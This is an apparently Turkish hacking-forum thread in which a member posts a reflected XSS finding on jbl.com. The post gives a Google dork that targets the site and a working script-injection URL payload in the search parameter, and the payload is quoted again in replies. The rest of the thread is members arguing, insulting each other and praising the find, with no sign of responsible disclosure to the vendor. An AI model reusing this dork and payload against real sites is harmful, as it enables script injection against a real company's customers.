JBL Reflected XSS Script Açığı $$

N S

Uzman üye
19 Haz 2013
1,139
208
Anlamlandıramadığım şey şu Dork ile Site bulup XSS tetiklemek yani anlam veremiyorum...

Biraz açıkların mantıklarına yönelseniz...

Emeğine sağlık
Spaghetti kod yazan, single thread curl atarak ddos programı yaptığını sanan, her siteyi düşürürüm gibi absürd idddiaları olan biri olduğun için refected xss açığının ne kadar tehlikeli olduğunu ve böyle bir markadaki yıkıcı etkilerini analiz edememen normal.
 

xezua

Katılımcı Üye
4 Tem 2023
342
100
Misconfiguration
Anlamlandıramadığım şey şu Dork ile Site bulup XSS tetiklemek yani anlam veremiyorum...

Biraz açıkların mantıklarına yönelseniz...

Emeğine sağlık
Yanlış bir yorum olmuş ne olursa olsun bulduğu açık riskli istediği şekilde zararlı html veya js kodu enjekte edebilirdi ama sadece imza bırakıp çıkmış formda böyle yorum yaparak insanları sadece küçük gibi gösterirsiniz.

Bu arada

Eline emeğine sağlık floria
🙃
 

Floria1

Katılımcı Üye
25 May 2023
900
531
Spaghetti kod yazan, single thread curl atarak ddos programı yaptığını sanan, her siteyi düşürürüm gibi absürd idddiaları olan biri olduğun için refected xss açığının ne kadar tehlikeli olduğunu ve böyle bir markadaki yıkıcı etkilerini analiz edememen normal.
(y)
Eline sağlık abi
Eline emeğine sağlık floria 🙃
Teşekkürler.
 

Zwo

Katılımcı Üye

JBL'in Scriptinde bulduğum Reflected Xss Zaafiyeti;

Dork:
intext:© 2023 Harman International Industries, Incorporated. Todos los derechos reservados. site:jbl.com

-

Kod:
/search?basketContents=&basketUrl=https://www.jbl.com/cart&cgid=https:support.jbl.comusen</script><script>alert(1)</script>

~

dkrphev.png

~

5sn6f18.png

~
df5h2px.png

~
s930i3w.png




BdExlJ.gif
++ Anka teame saygılarımı sunuyorum elinize sağlık hocalarım sorun çıkartan arkadaşların ne bildiği konusu tartışılmalı herkes bilgisi kadar konuşmalı bence iyi forumlar
 

Floria1

Katılımcı Üye
25 May 2023
900
531

Bunjo

Uzman üye
14 Ara 2020
1,592
1,889
I Won

JBL'in Scriptinde bulduğum Reflected Xss Zaafiyeti;

Dork:
intext:© 2023 Harman International Industries, Incorporated. Todos los derechos reservados. site:jbl.com

-

Kod:
/search?basketContents=&basketUrl=https://www.jbl.com/cart&cgid=https:support.jbl.comusen</script><script>alert(1)</script>

~

dkrphev.png

~

5sn6f18.png

~
df5h2px.png

~
s930i3w.png




BdExlJ.gif
Eline sağlık Floria, çok güzel bir konu olmuş.
 

ByFelez

Uzman üye
9 Tem 2013
1,818
1,774
Hackerone profilini paylaşabilirmisin ?
Marem kendine bu kadar güveniyorsun görelim.
Hesabım da ki raporlar ihlal yöntemleri kullanılarak devralındığı için hesap kapatıldı doğal olarak.

Anlam veremediğim Madem Hall Of Flame konularım Yanıltıcı Bulunuyor Konular Çöpe Taşınsın, Konularda ki Tepkime Puanlarım Silinsin

@Ares
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.